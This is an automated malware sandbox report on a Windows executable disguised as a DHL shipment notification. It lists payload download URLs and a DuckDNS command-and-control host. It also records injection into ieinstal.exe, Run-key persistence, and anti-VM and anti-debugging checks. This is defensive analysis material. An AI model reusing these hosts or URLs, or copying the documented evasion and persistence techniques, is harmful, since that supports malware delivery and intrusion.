Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Virustotal: Detection: 31% |
Perma Link |
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
ReversingLabs: Detection: 17% |
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Avira: detected |
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED |
Source: Traffic |
Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49806 -> 178.32.63.50:80 |
Source: unknown |
DNS query: name: septnet.duckdns.org |
Source: Joe Sandbox View |
ASN Name: TELIANETTeliaCarrierEU TELIANETTeliaCarrierEU |
Source: Joe Sandbox View |
ASN Name: OVHFR OVHFR |
Source: global traffic |
HTTP traffic detected: GET /moss/Host_AKhLBP62.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 178.32.63.50Cache-Control: no-cache |
Source: global traffic |
TCP traffic: 192.168.11.20:49807 -> 193.104.197.28:6577 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
Source: ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmp |
String found in binary or memory: http://178.32.63.50/boss/Host_AKhLBP62.bin |
Source: ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmp |
String found in binary or memory: http://178.32.63.50/moss/Host_AKhLBP62.bin |
Source: ieinstal.exe, 00000006.00000002.318237025480.0000000003229000.00000004.00000020.sdmp |
String found in binary or memory: http://178.32.63.50/moss/Host_AKhLBP62.bin: |
Source: ieinstal.exe, 00000006.00000002.318237025480.0000000003229000.00000004.00000020.sdmp |
String found in binary or memory: http://178.32.63.50/moss/Host_AKhLBP62.binF |
Source: ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmp |
String found in binary or memory: http://178.32.63.50/moss/Host_AKhLBP62.binhttp://178.32.63.50/boss/Host_AKhLBP62.binwininet.dllMozil |
Source: unknown |
DNS traffic detected: queries for: septnet.duckdns.org |
Source: global traffic |
HTTP traffic detected: GET /moss/Host_AKhLBP62.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 178.32.63.50Cache-Control: no-cache |
Source: initial sample |
Icon embedded in PE file: bad icon match: 20047c7c70f0e004 |
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_00403DD6 |
2_2_00403DD6 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_0040415B |
2_2_0040415B |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_023018E5 |
2_2_023018E5 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_0230C119 |
2_2_0230C119 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_0230E165 |
2_2_0230E165 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_0230303C |
2_2_0230303C |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_02304419 |
2_2_02304419 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_02304245 |
2_2_02304245 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_023042B5 |
2_2_023042B5 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_02304484 |
2_2_02304484 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_0230CED6 |
2_2_0230CED6 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_023036D9 |
2_2_023036D9 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_0230452C |
2_2_0230452C |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_02303700 |
2_2_02303700 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_02304358 |
2_2_02304358 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_02303BBC |
2_2_02303BBC |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_02303BBE |
2_2_02303BBE |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_02302F90 |
2_2_02302F90 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_02304195 |
2_2_02304195 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_02302F9B |
2_2_02302F9B |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_02304184 |
2_2_02304184 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_0230DC5F NtProtectVirtualMemory, |
2_2_0230DC5F |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_0230C119 NtAllocateVirtualMemory, |
2_2_0230C119 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_02307B69 NtWriteVirtualMemory, |
2_2_02307B69 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_02307BAC NtWriteVirtualMemory, |
2_2_02307BAC |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Code function: 6_2_030CED4E NtProtectVirtualMemory, |
6_2_030CED4E |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Code function: 6_2_030CEC4F Sleep,NtProtectVirtualMemory, |
6_2_030CEC4F |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Code function: 6_2_030CECBD Sleep,NtProtectVirtualMemory, |
6_2_030CECBD |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Code function: 6_2_030CED49 NtProtectVirtualMemory, |
6_2_030CED49 |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Code function: 6_2_030CED5C NtProtectVirtualMemory,NtProtectVirtualMemory, |
6_2_030CED5C |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Code function: 6_2_030CEDB8 NtProtectVirtualMemory, |
6_2_030CEDB8 |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Code function: 6_2_030CEE3A NtProtectVirtualMemory, |
6_2_030CEE3A |
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000002.00000002.313749031092.0000000000419000.00000002.00020000.sdmp |
Binary or memory string: OriginalFilenameVOLDFRELSERS.exe vs DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Binary or memory string: OriginalFilenameVOLDFRELSERS.exe vs DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Section loaded: edgegdi.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Section loaded: edgegdi.dll |
Jump to behavior |
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Virustotal: Detection: 31% |
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
ReversingLabs: Detection: 17% |
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Section loaded: C:\Windows\SysWOW64\msvbvm60.dll |
Jump to behavior |
Source: unknown |
Process created: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe 'C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe' |
|
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe' |
|
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe' |
Jump to behavior |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 |
Jump to behavior |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
File created: C:\Users\user\AppData\Local\Temp\LABERT |
Jump to behavior |
Source: classification engine |
Classification label: mal100.rans.troj.evad.winEXE@3/1@1/2 |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Mutant created: \Sessions\1\BaseNamedObjects\oILYSlqV |
Source: Yara match |
File source: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, type: MEMORY |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_00409455 push es; iretd |
2_2_00409456 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_00407E31 push ds; retf |
2_2_00407E32 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_004072C1 push edx; retf |
2_2_004072C2 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_00406294 push edx; retf |
2_2_00406297 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_00406D73 push es; retf |
2_2_00406D76 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_004099EF push esp; iretd |
2_2_004099F2 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_00407BFF push FFFFFFA7h; iretd |
2_2_00407C53 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_02300390 push BDC367A8h; ret |
2_2_02300383 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_02307F80 push FFFFFFAFh; ret |
2_2_02307F93 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_02304F84 push esi; iretd |
2_2_02304F87 |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Halvngen7 |
Jump to behavior |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Halvngen7 |
Jump to behavior |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
File opened: C:\Program Files\Qemu-ga\qemu-ga.exe |
Jump to behavior |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
File opened: C:\Program Files\qga\qga.exe |
Jump to behavior |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
File opened: C:\Program Files\Qemu-ga\qemu-ga.exe |
Jump to behavior |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
File opened: C:\Program Files\qga\qga.exe |
Jump to behavior |
Source: ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmp |
Binary or memory string: NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEUSER32PSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=\CIRKUSFORESTILLINGER.EXE\LABERTSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNHALVNGEN7HTTP://178.32.63.50/MOSS/HOST_AKHLBP62.BINHTTP://178.32.63.50/BOSS/HOST_AKHLBP62.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO |
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000002.00000002.313750631050.00000000022E0000.00000004.00000001.sdmp |
Binary or memory string: NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEUSER32PSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=PROGRAMFILES=\INTERNET EXPLORER\IEINSTAL.EXEWINDIR=\SYSWOW64\MSVBVM60.DLL |
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000002.00000002.313750631050.00000000022E0000.00000004.00000001.sdmp, ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmp |
Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 6880 |
Thread sleep count: 9976 > 30 |
Jump to behavior |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 6880 |
Thread sleep time: -49880s >= -30000s |
Jump to behavior |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Thread sleep count: Count: 9976 delay: -5 |
Jump to behavior |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_02303B3F rdtsc |
2_2_02303B3F |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Window / User API: threadDelayed 9976 |
Jump to behavior |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
System information queried: ModuleInformation |
Jump to behavior |
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000002.00000002.313750631050.00000000022E0000.00000004.00000001.sdmp |
Binary or memory string: ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeuser32psapi.dllMsi.dllPublishershell32advapi32TEMP=ProgramFiles=\internet explorer\ieinstal.exewindir=\syswow64\msvbvm60.dll |
Source: ieinstal.exe, 00000006.00000002.318236722320.00000000031E8000.00000004.00000020.sdmp |
Binary or memory string: Hyper-V RAW |
Source: ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmp |
Binary or memory string: ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeuser32psapi.dllMsi.dllPublishershell32advapi32TEMP=\Cirkusforestillinger.exe\LABERTSoftware\Microsoft\Windows\CurrentVersion\RunHalvngen7http://178.32.63.50/moss/Host_AKhLBP62.binhttp://178.32.63.50/boss/Host_AKhLBP62.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko |
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000002.00000002.313750631050.00000000022E0000.00000004.00000001.sdmp, ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmp |
Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Thread information set: HideFromDebugger |
Jump to behavior |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Thread information set: HideFromDebugger |
Jump to behavior |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_02303B3F rdtsc |
2_2_02303B3F |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_02305833 mov eax, dword ptr fs:[00000030h] |
2_2_02305833 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_02305859 mov eax, dword ptr fs:[00000030h] |
2_2_02305859 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_023088B5 mov eax, dword ptr fs:[00000030h] |
2_2_023088B5 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_023058BF mov eax, dword ptr fs:[00000030h] |
2_2_023058BF |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_0230CED6 mov eax, dword ptr fs:[00000030h] |
2_2_0230CED6 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_0230599C mov eax, dword ptr fs:[00000030h] |
2_2_0230599C |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_0230BDCB mov eax, dword ptr fs:[00000030h] |
2_2_0230BDCB |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Process queried: DebugPort |
Jump to behavior |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Process queried: DebugPort |
Jump to behavior |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_02308A19 LdrInitializeThunk, |
2_2_02308A19 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_0230E165 RtlAddVectoredExceptionHandler, |
2_2_0230E165 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 30C0000 |
Jump to behavior |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_0230CED6 LoadLibraryA,LogonUserA, |
2_2_0230CED6 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe' |
Jump to behavior |
Source: ieinstal.exe, 00000006.00000002.318237700383.00000000039C1000.00000002.00020000.sdmp |
Binary or memory string: Program Manager |
Source: ieinstal.exe, 00000006.00000002.318237700383.00000000039C1000.00000002.00020000.sdmp |
Binary or memory string: Shell_TrayWnd |
Source: ieinstal.exe, 00000006.00000002.318237700383.00000000039C1000.00000002.00020000.sdmp |
Binary or memory string: Progman |
Source: ieinstal.exe, 00000006.00000002.318237700383.00000000039C1000.00000002.00020000.sdmp |
Binary or memory string: Progmanlock |